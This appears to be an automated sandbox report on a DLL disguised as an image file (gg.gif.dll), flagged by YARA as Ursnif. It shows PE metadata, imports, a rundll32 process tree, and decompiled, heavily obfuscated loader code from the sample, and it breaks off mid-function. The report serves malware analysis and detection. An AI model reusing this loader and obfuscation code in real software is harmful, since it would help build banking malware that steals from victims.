                DLL Characteristics:
                Time Stamp:0x6066E9D0 [Fri Apr 2 09:54:24 2021 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:3f728412058b62c418b1091768b74d7b

                Entrypoint Preview

                Instruction
                push ebx
                push esi
                and dword ptr [esp], 00000000h
                or dword ptr [esp], ebp
                mov ebp, esp
                add esp, FFFFFFF8h
                push esp
                mov dword ptr [esp], FFFF0000h
                call 00007F007C7F9081h
                push eax
                add dword ptr [esp], 00000247h
                sub dword ptr [esp], eax
                push esi
                mov dword ptr [esp], 00001567h
                call 00007F007C7F7FF7h
                push eax
                or dword ptr [esp], eax
                pop eax
                jne 00007F007C7FD2FBh
                pushad
                push 00000000h
                mov dword ptr [esp], esi
                xor esi, esi
                xor esi, dword ptr [ebx+0041C627h]
                mov eax, esi
                pop esi
                push ebx
                add dword ptr [esp], 40h
                sub dword ptr [esp], ebx
                push ebp
                add dword ptr [esp], 00001000h
                sub dword ptr [esp], ebp
                mov dword ptr [ebp-04h], 00000000h
                push dword ptr [ebp-04h]
                xor dword ptr [esp], eax
                push 00000000h
                call dword ptr [ebx+0041F05Ch]
                mov dword ptr [ebp-04h], ecx
                xor ecx, dword ptr [ebp-04h]
                or ecx, eax
                and edi, 00000000h
                xor edi, ecx
                mov ecx, dword ptr [ebp-04h]
                push edi
                pop dword ptr [ebp-04h]
                push dword ptr [ebp-04h]
                pop dword ptr [ebx+0041CAEDh]
                cmp ebx, 00000000h
                jbe 00007F007C7FD2ECh
                push 00000000h
                add dword ptr [esp], edx
                push dword ptr [ebx+0041C166h]
                pop edx
                add edx, ebx
                mov dword ptr [ebx+0041C166h], edx
                pop edx
                push 00000000h
                add dword ptr [esp], edx
                push dword ptr [ebx+0041CECAh]
                pop edx
                add edx, ebx
                mov dword ptr [ebx+0041CECAh], edx
                pop edx
                push ebp
                and ebp, 00000000h
                or ebp, dword ptr [ebx+0041C166h]

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x1a0000x64.data
                IMAGE_DIRECTORY_ENTRY_IMPORT0x1f0fc0x118.data
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x1f0000xfc.data
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .code0x10000x185f20x18600False0.670042067308data6.53345039933IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                .data0x1a0000x640x200False0.16796875data1.0662581269IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0x1b0000x10000x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                .rdata0x1c0000x20b30x2200False0.359834558824data2.96025706595IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                .data0x1f0000x7b20x800False0.45703125data4.70767794561IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                Imports

                DLLImport
                user32.dllGetActiveWindow, SetWindowsHookExA, GetLayeredWindowAttributes
                kernel32.dllGetProcAddress, LoadLibraryA, VirtualProtect, VirtualAlloc, lstrlenA, lstrcatA, lstrcmpA, GetEnvironmentVariableW
                ole32.dllOleInitialize, OleQueryCreateFromData, IIDFromString, CLIPFORMAT_UserUnmarshal, OleCreateEmbeddingHelper, HDC_UserSize
                msimg32.dllAlphaBlend, TransparentBlt
                comdlg32.dllPageSetupDlgA, PrintDlgA
                oledlg.dllOleUICanConvertOrActivateAs, OleUIChangeSourceW, OleUIConvertA
                comctl32.dllCreateStatusWindow, LBItemFromPt, DPA_Create, FlatSB_ShowScrollBar, ImageList_GetFlags
                oleacc.dllIID_IAccessible, LresultFromObject
                version.dllVerFindFileW, VerInstallFileA, VerQueryValueA, VerQueryValueW
                gdiplus.dllGdipEnumerateMetafileDestPointI, GdipCreateBitmapFromHBITMAP, GdipSetPenUnit, GdipGetImageEncoders, GdipGetPathPointsI
                winspool.drvFindNextPrinterChangeNotification, ConnectToPrinterDlg, SetPrinterDataW, GetPrinterW, DeletePrinterDataExW
                shell32.dllSHGetSpecialFolderPathA
                advapi32.dllGetKernelObjectSecurity, CryptEnumProviderTypesA, RegQueryValueExW, RegisterIdleTask

                Exports

                NameOrdinalAddress
                DllServer10x1000447b

                Network Behavior

                No network behavior found

                Code Manipulations

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:10:05:28
                Start date:06/04/2021
                Path:C:\Windows\System32\loaddll32.exe
                Wow64 process (32bit):true
                Commandline:loaddll32.exe 'C:\Users\user\Desktop\gg.gif.dll'
                Imagebase:0x130000
                File size:116736 bytes
                MD5 hash:542795ADF7CC08EFCF675D65310596E8
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.605125976.00000000034F0000.00000004.00000001.sdmp, Author: Joe Security
                Reputation:moderate

                General

                Start time:10:05:29
                Start date:06/04/2021
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\gg.gif.dll',#1
                Imagebase:0xbd0000
                File size:232960 bytes
                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:10:05:29
                Start date:06/04/2021
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe C:\Users\user\Desktop\gg.gif.dll,DllServer
                Imagebase:0xd00000
                File size:61952 bytes
                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.252036130.00000000032C0000.00000004.00000001.sdmp, Author: Joe Security
                Reputation:high

                General

                Start time:10:05:29
                Start date:06/04/2021
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:rundll32.exe 'C:\Users\user\Desktop\gg.gif.dll',#1
                Imagebase:0xd00000
                File size:61952 bytes
                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.299614666.00000000046D0000.00000004.00000001.sdmp, Author: Joe Security
                Reputation:high

                Disassembly

                Code Analysis

                Reset < >

                  Executed Functions

                  C-Code - Quality: 79%
                  			E1000163F(char _a4) {
                  				long _v8;
                  				struct _SYSTEMTIME _v24;
                  				char _v48;
                  				void* __edi;
                  				long _t20;
                  				int _t22;
                  				long _t25;
                  				long _t26;
                  				long _t30;
                  				void* _t36;
                  				intOrPtr _t38;
                  				intOrPtr _t43;
                  				signed int _t44;
                  				void* _t48;
                  				signed int _t51;
                  				void* _t54;
                  				intOrPtr* _t55;
                  
                  				_t20 = E10001850();
                  				_v8 = _t20;
                  				if(_t20 != 0) {
                  					return _t20;
                  				}
                  				do {
                  					GetSystemTime( &_v24);
                  					_t22 = SwitchToThread();
                  					asm("cdq");
                  					_t44 = 9;
                  					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
                  					_t25 = E100018F4(0, _t51); // executed
                  					_v8 = _t25;
                  					Sleep(_t51 << 5); // executed
                  					_t26 = _v8;
                  				} while (_t26 == 0xc);
                  				if(_t26 != 0) {
                  					L18:
                  					return _t26;
                  				}
                  				if(_a4 != 0) {
                  					L11:
                  					_push(0);
                  					_t54 = E100012DC(E1000135A,  &_v48);
                  					if(_t54 == 0) {
                  						_v8 = GetLastError();
                  					} else {
                  						_t30 = WaitForSingleObject(_t54, 0xffffffff);
                  						_v8 = _t30;
                  						if(_t30 == 0) {
                  							GetExitCodeThread(_t54,  &_v8); // executed
                  						}
                  						CloseHandle(_t54);
                  					}
                  					_t26 = _v8;
                  					if(_t26 == 0xffffffff) {
                  						_t26 = GetLastError();
                  					}
                  					goto L18;
                  				}
                  				if(E10001538(_t44,  &_a4) != 0) {
                  					 *0x10004138 = 0;
                  					goto L11;
                  				}
                  				_t43 = _a4;
                  				_t55 = __imp__GetLongPathNameW;
                  				_t36 =  *_t55(_t43, 0, 0); // executed
                  				_t48 = _t36;
                  				if(_t48 == 0) {
                  					L9:
                  					 *0x10004138 = _t43;
                  					goto L11;
                  				}
                  				_t14 = _t48 + 2; // 0x2
                  				_t38 = E10001DE1(_t48 + _t14);
                  				 *0x10004138 = _t38;
                  				if(_t38 == 0) {
                  					goto L9;
                  				}
                  				 *_t55(_t43, _t38, _t48); // executed
                  				E10001DFC(_t43);
                  				goto L11;
                  			}




















                  0x10001646
                  0x1000164f
                  0x10001652
                  0x10001742
                  0x10001742
                  0x10001659
                  0x1000165d
                  0x10001663
                  0x10001671
                  0x10001672
                  0x10001675
                  0x10001678
                  0x10001681
                  0x10001684
                  0x1000168a
                  0x1000168d
                  0x10001694
                  0x1000173f
                  0x00000000
                  0x1000173f
                  0x1000169e
                  0x100016ef
                  0x100016ef
                  0x10001705
                  0x1000170a
                  0x10001732
                  0x1000170c
                  0x1000170f
                  0x10001717
                  0x1000171a
                  0x10001721
                  0x10001721
                  0x10001728
                  0x10001728
                  0x10001735
                  0x1000173b
                  0x1000173d
                  0x1000173d
                  0x00000000
                  0x1000173b
                  0x100016ab
                  0x100016e9
                  0x00000000
                  0x100016e9
                  0x100016ad
                  0x100016b0
                  0x100016b9
                  0x100016bb
                  0x100016bf
                  0x100016e1
                  0x100016e1
                  0x00000000
                  0x100016e1
                  0x100016c1
                  0x100016c6
                  0x100016cd
                  0x100016d2
                  0x00000000
                  0x00000000
                  0x100016d7
                  0x100016da
                  0x00000000

                  APIs
                    • Part of subcall function 10001850: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,1000164B,74B063F0), ref: 1000185F
                    • Part of subcall function 10001850: GetVersion.KERNEL32 ref: 1000186E
                    • Part of subcall function 10001850: GetCurrentProcessId.KERNEL32 ref: 10001885
                    • Part of subcall function 10001850: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 1000189E
                  • GetSystemTime.KERNEL32(?,00000000,74B063F0), ref: 1000165D
                  • SwitchToThread.KERNEL32 ref: 10001663
                    • Part of subcall function 100018F4: VirtualAlloc.KERNELBASE(00000000,1000167D,00003000,00000004,?,?,1000167D,00000000), ref: 1000194A
                    • Part of subcall function 100018F4: memcpy.NTDLL(?,?,1000167D,?,?,1000167D,00000000), ref: 100019DC
                    • Part of subcall function 100018F4: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,1000167D,00000000), ref: 100019F7
                  • Sleep.KERNELBASE(00000000,00000000), ref: 10001684
                  • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 100016B9
                  • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 100016D7
                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 1000170F
                  • GetExitCodeThread.KERNELBASE(00000000,?), ref: 10001721
                  • CloseHandle.KERNEL32(00000000), ref: 10001728
                  • GetLastError.KERNEL32(?,00000000), ref: 10001730
                  • GetLastError.KERNEL32 ref: 1000173D
                  Memory Dump Source
                  • Source File: 00000000.00000002.605461438.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.605430033.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.605499359.0000000010005000.00000040.00020000.sdmp Download File
                  Similarity
                  • API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
                  • String ID:
                  • API String ID: 2280543912-0
                  • Opcode ID: 1d94a8f484d99c584117039eeacf9866d0a4ad351db0f72dece7264e9d25b94c
                  • Instruction ID: 51f1b5d7b5d62603e0b6ca74e6a4c687eacd357270907eacbd85172d1a2e8795
                  • Opcode Fuzzy Hash: 1d94a8f484d99c584117039eeacf9866d0a4ad351db0f72dece7264e9d25b94c
                  • Instruction Fuzzy Hash: 2D318F76901225ABE711EBA58C849DF77FDEF843D0B124226F914D3148EB34DB40DB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 75%
                  			E03055F16(void* __eax, signed int __ebx, void* __ecx, signed int __edx, signed int __esi, signed int _a4) {
                  				signed int _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				signed int _v20;
                  				void* __edi;
                  				signed int _t610;
                  				void* _t612;
                  				signed int _t613;
                  				intOrPtr _t619;
                  				void* _t626;
                  				void* _t628;
                  				void* _t630;
                  				signed int _t631;
                  				signed int _t633;
                  				signed int _t636;
                  				signed int _t638;
                  				void* _t640;
                  				intOrPtr _t641;
                  				signed int _t644;
                  				void* _t646;
                  				signed int _t647;
                  				signed int _t650;
                  				signed int _t652;
                  				signed int _t653;
                  				intOrPtr _t656;
                  				signed int _t658;
                  				signed int _t661;
                  				signed int _t665;
                  				void* _t667;
                  				signed int _t668;
                  				signed int _t671;
                  				signed int _t675;
                  				signed int _t677;
                  				void* _t679;
                  				signed int _t680;
                  				signed int _t682;
                  				signed int _t684;
                  				signed int _t689;
                  				void* _t691;
                  				signed int _t692;
                  				signed int _t698;
                  				signed int _t701;
                  				signed int _t706;
                  				void* _t708;
                  				intOrPtr _t709;
                  				signed int _t711;
                  				void* _t713;
                  				signed int _t714;
                  				signed int _t717;
                  				intOrPtr _t720;
                  				signed int _t722;
                  				void* _t724;
                  				signed int _t726;
                  				intOrPtr _t729;
                  				void* _t730;
                  				signed int _t733;
                  				void* _t739;
                  				void* _t741;
                  				void* _t742;
                  				signed int _t744;
                  				void* _t746;
                  				signed int _t747;
                  				signed int _t753;
                  				signed int _t756;
                  				signed int _t760;
                  				void* _t762;
                  				signed int _t767;
                  				signed int _t771;
                  				void* _t773;
                  				void* _t775;
                  				void* _t776;
                  				intOrPtr _t778;
                  				signed int _t781;
                  				signed int _t785;
                  				intOrPtr _t788;
                  				signed int _t791;
                  				intOrPtr _t794;
                  				signed int _t797;
                  				signed int _t813;
                  				signed int _t816;
                  				void* _t819;
                  				signed int _t821;
                  				signed int _t824;
                  				void* _t827;
                  				void* _t828;
                  				void* _t830;
                  				signed int _t836;
                  				signed int _t840;
                  				signed int _t842;
                  				signed int _t844;
                  				signed int _t851;
                  				signed int _t856;
                  				signed int _t859;
                  				signed int _t862;
                  				signed int _t865;
                  				signed int _t867;
                  				signed int _t869;
                  				signed int _t875;
                  				signed int _t882;
                  				void* _t888;
                  				signed int _t889;
                  				signed int _t893;
                  				signed int _t896;
                  				signed int _t901;
                  				signed int _t906;
                  				signed int _t908;
                  				signed int _t916;
                  				signed int _t920;
                  				signed int _t924;
                  				signed int _t926;
                  				signed int _t928;
                  				signed int _t931;
                  				signed int _t934;
                  				signed int _t936;
                  				signed int _t939;
                  				signed int _t945;
                  				signed int _t947;
                  				signed int _t950;
                  				signed int _t953;
                  				signed int _t955;
                  				signed int _t958;
                  				void* _t966;
                  				signed int _t969;
                  				signed int _t975;
                  				signed int _t977;
                  				signed int _t979;
                  				signed int _t981;
                  				signed int _t986;
                  				signed int _t987;
                  				signed int _t1002;
                  				signed int _t1005;
                  				signed int _t1009;
                  				signed int _t1012;
                  				signed int _t1015;
                  				signed int _t1018;
                  				signed int _t1020;
                  				signed int _t1023;
                  				signed int _t1026;
                  				signed int _t1028;
                  				signed int _t1031;
                  				signed int _t1034;
                  				signed int _t1035;
                  				void* _t1036;
                  				long _t1041;
                  				void* _t1043;
                  				signed int _t1045;
                  				signed int _t1052;
                  				signed int _t1054;
                  				signed int _t1057;
                  				signed int _t1060;
                  				signed int _t1063;
                  				signed int _t1065;
                  				signed int _t1068;
                  				void* _t1069;
                  				signed int _t1071;
                  				signed int _t1074;
                  				void* _t1077;
                  				signed int _t1078;
                  				signed int _t1081;
                  				signed int _t1085;
                  				void* _t1089;
                  				signed int _t1091;
                  				void* _t1097;
                  				void* _t1102;
                  				signed int _t1103;
                  				signed int _t1106;
                  				void* _t1109;
                  				signed int _t1112;
                  				signed int _t1119;
                  				signed int* _t1120;
                  				signed int* _t1121;
                  				signed int* _t1122;
                  				signed int* _t1123;
                  				signed int* _t1124;
                  				signed int* _t1125;
                  				signed int* _t1126;
                  				signed int* _t1127;
                  				signed int* _t1128;
                  				signed int* _t1129;
                  				signed int* _t1130;
                  				signed int* _t1131;
                  				signed int* _t1132;
                  				signed int* _t1133;
                  				signed int* _t1134;
                  				signed int* _t1136;
                  				signed int* _t1139;
                  				signed int* _t1140;
                  				signed int* _t1141;
                  				signed int* _t1142;
                  				signed int* _t1143;
                  				signed int* _t1144;
                  
                  				_t1063 = __esi;
                  				_t813 = __ebx;
                  				_push(__eax);
                  				 *_t1119 =  *_t1119 & 0x00000000;
                  				 *_t1119 =  *_t1119 + _t1102;
                  				_t1103 = _t1119;
                  				_t1120 = _t1119 + 0xfffffff0;
                  				_push(_t1103);
                  				 *_t1120 =  *_t1120 & 0x00000000;
                  				 *_t1120 =  *_t1120 + __ecx;
                  				_push(__ecx);
                  				 *_t1120 =  *_t1120 & 0x00000000;
                  				 *_t1120 =  *_t1120 ^ __edx;
                  				_push(_t1103);
                  				 *_t1120 =  *_t1120 ^ _t1103;
                  				 *_t1120 =  *_t1120 ^ __ebx + 0x0041cca8;
                  				_v16 = _v16 & 0x00000000;
                  				_push(_v16);
                  				 *_t1120 =  *_t1120 + __ebx + 0x41cd5f;
                  				_push( *((intOrPtr*)(__ebx + 0x41f068))());
                  				_pop( *_t7);
                  				_push(_v16);
                  				_pop( *_t9);
                  				_pop( *_t10);
                  				_t920 = _v16;
                  				_t1121 = _t1120 - 0xfffffffc;
                  				_push(__esi);
                  				 *_t1121 =  *_t1121 ^ __esi;
                  				 *_t1121 =  *_t1120;
                  				_push(_v16);
                  				 *_t1121 = _t920;
                  				_push(_t1002);
                  				 *_t1121 =  *_t1121 - _t1002;
                  				 *_t1121 =  *_t1121 ^ __ebx + 0x0041c01b;
                  				_t610 =  *((intOrPtr*)(__ebx + 0x41f060))();
                  				_push(_v16);
                  				 *_t1121 = _t610;
                  				_push(__esi);
                  				 *_t1121 =  *_t1121 & 0x00000000;
                  				 *_t1121 =  *_t1121 + __ebx + 0x41c678;
                  				_t612 =  *((intOrPtr*)(__ebx + 0x41f060))();
                  				_pop( *_t18);
                  				_push(_t920);
                  				 *_t20 = _t612;
                  				_v20 = _v20 + _v20;
                  				_push(_v20);
                  				_pop(_t613);
                  				_v20 = _t613;
                  				_t836 = 0 ^  *(__ebx + 0x41c55d);
                  				if(_t836 > _v20) {
                  					_push(_v12);
                  					 *_t1121 = __ebx + 0x41c01b;
                  					_push(_t1103);
                  					 *_t1121 =  *_t1121 ^ _t1103;
                  					 *_t1121 =  *_t1121 + __ebx + 0x41c678;
                  					_push( *((intOrPtr*)(__ebx + 0x41f064))());
                  					_pop( *_t31);
                  					_push(_v20);
                  					_pop( *_t33);
                  				}
                  				_pop( *_t34);
                  				_t924 = _v20;
                  				 *_t1121 =  *_t1121 & 0x00000000;
                  				 *_t1121 =  *_t1121 + _t924;
                  				 *_t1121 =  *_t1121 & 0x00000000;
                  				 *_t1121 =  *_t1121 | _t813 + 0x0041c8b2;
                  				 *_t1121 =  *_t1121 & 0x00000000;
                  				 *_t1121 =  *_t1121 + _t813 + 0x41d167;
                  				_t619 =  *((intOrPtr*)(_t813 + 0x41f068))(_t924, _t924, _t836);
                  				_v12 = _t836;
                  				 *((intOrPtr*)(_t813 + 0x41c883)) = _t619;
                  				 *_t1121 = _t813 + 0x41c565;
                  				_v12 = 0;
                  				 *_t1121 =  *_t1121 | _t813 + 0x0041c574;
                  				_push( *((intOrPtr*)(_t813 + 0x41f060))(_v12, _v20));
                  				_pop( *_t48);
                  				_push(_v20);
                  				_pop( *_t50);
                  				_pop( *_t51);
                  				 *_t1121 =  *_t1121 - _t1103;
                  				 *_t1121 =  *_t1121 ^ _v20;
                  				 *_t1121 =  *_t1121 ^ _t813;
                  				 *_t1121 =  *_t1121 + _t813 + 0x41cd20;
                  				_push( *((intOrPtr*)(_t813 + 0x41f060))(_t813, _t1103));
                  				_pop( *_t55);
                  				_push(_v16);
                  				_pop( *_t57);
                  				_t626 =  *((intOrPtr*)(_t813 + 0x41f060))();
                  				_v16 = _v16 & 0x00000000;
                  				 *_t1121 =  *_t1121 + _t626;
                  				_v16 = _v16 & 0x00000000;
                  				 *_t1121 =  *_t1121 + _t813 + 0x41c3ee;
                  				_t628 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v16);
                  				 *_t1121 =  *_t1121 ^ _t924;
                  				 *_t1121 =  *_t1121 + _t628;
                  				_v12 = _v12 & 0x00000000;
                  				 *_t1121 =  *_t1121 | _t813 + 0x0041cfe9;
                  				_t630 =  *((intOrPtr*)(_t813 + 0x41f060))(_v12, _t924);
                  				_pop( *_t72);
                  				_t840 = _v20;
                  				 *_t74 = _t630;
                  				_v20 = _v20 + _t840;
                  				_push(_v20);
                  				_pop(_t631);
                  				_t1065 = _t1063;
                  				_t842 = _t840 & 0x00000000 | _t1103 & 0x00000000 ^  *(_t813 + 0x41ca09);
                  				_t1106 = _t1103;
                  				if(_t842 > _t631) {
                  					 *_t1121 =  *_t1121 & 0x00000000;
                  					 *_t1121 =  *_t1121 + _t813 + 0x41c3ee;
                  					 *_t1121 = _t813 + 0x41cfe9;
                  					_t631 =  *((intOrPtr*)(_t813 + 0x41f064))(_v12, _t813);
                  					_push(_t924);
                  					 *(_t813 + 0x41c365) =  *(_t813 + 0x41c365) & 0x00000000;
                  					 *(_t813 + 0x41c365) =  *(_t813 + 0x41c365) ^ _t924 & 0x00000000 ^ _t631;
                  				}
                  				_t633 = _t631 & 0x00000000 ^  *_t1121;
                  				_t1122 =  &(_t1121[1]);
                  				 *_t1122 = _t1002;
                  				 *(_t813 + 0x41d240) = _t633;
                  				_t1005 = 0;
                  				_pop( *_t88);
                  				_t926 = 0 ^ _v20;
                  				_pop( *_t90);
                  				_t844 = _t842 & 0x00000000 ^ _v16;
                  				 *_t1122 =  *_t1122 & 0x00000000;
                  				 *_t1122 =  *_t1122 ^ _t926;
                  				 *_t1122 =  *_t1122 & 0x00000000;
                  				 *_t1122 =  *_t1122 | _t844;
                  				 *_t1122 =  *_t1122 & 0x00000000;
                  				 *_t1122 =  *_t1122 ^ _t813 + 0x0041c624;
                  				_v12 = _v12 & 0x00000000;
                  				 *_t1122 =  *_t1122 ^ _t813 + 0x0041d36b;
                  				_t636 =  *((intOrPtr*)(_t813 + 0x41f068))(_v12, _t926, _t1005, _t633);
                  				 *(_t813 + 0x41c655) =  *(_t813 + 0x41c655) & 0x00000000;
                  				 *(_t813 + 0x41c655) =  *(_t813 + 0x41c655) | _t844 -  *_t1122 ^ _t636;
                  				_t1123 =  &(_t1122[1]);
                  				_v16 = _v16 & 0x00000000;
                  				 *_t1123 =  *_t1123 ^  *_t1122;
                  				_v16 = 0;
                  				 *_t1123 =  *_t1123 ^ _t813 + 0x0041c891;
                  				_t638 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v16, _t844);
                  				 *_t1123 =  *_t1123 - _t1106;
                  				 *_t1123 =  *_t1123 | _t638;
                  				_v12 = 0;
                  				 *_t1123 =  *_t1123 ^ _t813 + 0x0041c30f;
                  				_t640 =  *((intOrPtr*)(_t813 + 0x41f060))(_v12, _t1106);
                  				_t851 =  *_t1123;
                  				_t1124 =  &(_t1123[1]);
                  				 *_t113 = _t640;
                  				_v16 = _v16 + _t851;
                  				_push(_v16);
                  				_pop(_t641);
                  				_t928 = _t926;
                  				_v16 = _t1005;
                  				if((_t851 & 0x00000000 | _t1005 ^ _v16 |  *(_t813 + 0x41ca38)) > _t641) {
                  					_v20 = _v20 & 0x00000000;
                  					 *_t1124 =  *_t1124 | _t813 + 0x0041c891;
                  					_v12 = 0;
                  					 *_t1124 =  *_t1124 + _t813 + 0x41c30f;
                  					_t641 =  *((intOrPtr*)(_t813 + 0x41f064))(_v12, _v20);
                  				}
                  				 *_t1124 = _t928;
                  				 *((intOrPtr*)(_t813 + 0x41c910)) = _t641;
                  				_t931 = 0;
                  				_v12 = _t1065;
                  				_t1068 = _v12;
                  				_v12 = 0;
                  				 *_t1124 =  *_t1124 | 0 ^ _a4;
                  				_v16 = 0;
                  				 *_t1124 =  *_t1124 | _t813 + 0x0041c9ef;
                  				_t644 =  *((intOrPtr*)(_t813 + 0x41f060))(_v16, _v12);
                  				_v12 = 0;
                  				 *_t1124 =  *_t1124 ^ _t644;
                  				 *_t1124 = _t813 + 0x41cb65;
                  				_t646 =  *((intOrPtr*)(_t813 + 0x41f060))(_v20, _v12);
                  				_t1125 =  &(_t1124[1]);
                  				_v12 = _t931;
                  				_push( *_t1124 + _t646);
                  				_t934 = _v12;
                  				_pop(_t647);
                  				_v12 = _t647;
                  				_t856 = 0 ^  *(_t813 + 0x41c187);
                  				_t650 = _v12;
                  				if(_t856 > _t650) {
                  					_v20 = 0;
                  					 *_t1125 =  *_t1125 | _t813 + 0x0041c9ef;
                  					 *_t1125 =  *_t1125 ^ _t856;
                  					 *_t1125 =  *_t1125 + _t813 + 0x41cb65;
                  					_t650 =  *((intOrPtr*)(_t813 + 0x41f064))(_t856, _v20);
                  					_v16 = _t1068;
                  					 *(_t813 + 0x41c651) =  *(_t813 + 0x41c651) & 0x00000000;
                  					 *(_t813 + 0x41c651) =  *(_t813 + 0x41c651) | _t1068 ^ _v16 | _t650;
                  					_t1068 = _v16;
                  				}
                  				_t652 = _t650 & 0x00000000 ^  *_t1125;
                  				_t1126 = _t1125 - 0xfffffffc;
                  				 *_t162 = _t652;
                  				_v16 = _v16 +  *((intOrPtr*)(_t652 + 0x3c));
                  				_push(_v16);
                  				_pop(_t653);
                  				_t936 = _t934;
                  				 *_t1126 = _t653;
                  				 *_t1126 =  *_t1126 & 0x00000000;
                  				 *_t1126 =  *_t1126 ^ _t813 + 0x0041c16e;
                  				 *_t1126 = _t813 + 0x41ce8a;
                  				_t656 =  *((intOrPtr*)(_t813 + 0x41f068))(_v20, _t1068, _v20);
                  				 *_t1126 = _t1106;
                  				 *((intOrPtr*)(_t813 + 0x41c0cc)) = _t656;
                  				_t1109 = 0;
                  				_t658 =  *_t1126;
                  				_t1127 =  &(_t1126[1]);
                  				 *_t1127 = _t658;
                  				 *_t1127 =  *_t1127 - _t856;
                  				 *_t1127 =  *_t1127 ^ _t658;
                  				 *_t1127 =  *_t1127 - _t936;
                  				 *_t1127 =  *_t1127 + _t813 + 0x41c791;
                  				_v12 = _v12 & 0x00000000;
                  				 *_t1127 =  *_t1127 ^ _t813 + 0x0041ca02;
                  				_t661 =  *((intOrPtr*)(_t813 + 0x41f068))(_v12, _t936, _t856, _v16);
                  				 *_t1127 = _t936;
                  				 *(_t813 + 0x41c9e0) = 0 ^ _t661;
                  				_t939 = 0;
                  				_t1128 = _t1127 - 0xfffffffc;
                  				_v20 = _t813;
                  				_t1009 =  *_t1127;
                  				_t816 = _v20;
                  				_v12 = 0;
                  				 *_t1128 =  *_t1128 | _t816 + 0x0041c000;
                  				_t665 =  *((intOrPtr*)(_t816 + 0x41f060))(_v12);
                  				 *_t1128 =  *_t1128 ^ _t1009;
                  				 *_t1128 = _t665;
                  				 *_t1128 =  *_t1128 - _t1009;
                  				 *_t1128 =  *_t1128 ^ _t816 + 0x0041cc73;
                  				_t667 =  *((intOrPtr*)(_t816 + 0x41f060))(_t1009, _t1009);
                  				_t1129 =  &(_t1128[1]);
                  				 *_t1129 =  *_t1129 ^ _t1068;
                  				_t1069 = _t667;
                  				_t668 = _t1069 + (_t856 & 0x00000000 |  *_t1128);
                  				_t1071 = 0;
                  				_v20 = _t1009;
                  				_t859 = 0 ^  *(_t816 + 0x41c250);
                  				_t1012 = _v20;
                  				if(_t859 > _t668) {
                  					 *_t1129 =  *_t1129 - _t1012;
                  					 *_t1129 =  *_t1129 ^ _t816 + 0x0041c000;
                  					_v12 = 0;
                  					 *_t1129 =  *_t1129 | _t816 + 0x0041cc73;
                  					_t668 =  *((intOrPtr*)(_t816 + 0x41f064))(_v12, _t1012);
                  				}
                  				 *(_t816 + 0x41c695) =  *(_t816 + 0x41c695) & 0x00000000;
